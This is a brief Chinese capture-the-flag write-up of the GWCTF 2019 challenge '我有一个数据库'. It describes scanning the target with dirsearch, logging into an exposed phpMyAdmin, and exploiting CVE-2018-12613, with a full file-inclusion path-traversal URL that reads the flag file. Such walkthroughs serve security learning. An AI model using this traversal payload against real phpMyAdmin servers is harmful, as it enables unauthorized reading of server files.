[GWCTF 2019]我有一个数据库

题目一打开就是乱码,查看源码也没有提示。
那就用dirsearch扫描一下,发现页面:robots.txt phpinfo.php phpmyadmin,那就赶快打开phpmyadmin。
发现能直接登陆
[GWCTF 2019]我有一个数据库_第1张图片
在phpmyadmin最下面我发现了phpmyadmin的版本有些不同
[GWCTF 2019]我有一个数据库_第2张图片
这个版本的phpmyadmin有些漏洞
cve-2018-12613-PhpMyadmin后台文件包含
https://www.jianshu.com/p/fb9c2ae16d09
通过这个漏洞构造url;http://230ebd71-f4b6-4816-82a9-43b9eab30f60.node3.buuoj.cn/phpmyadmin/index.php?target=sql.php?/…/…/…/…/…/…/…/…/flag
成功获取flag

你可能感兴趣的:([GWCTF 2019]我有一个数据库)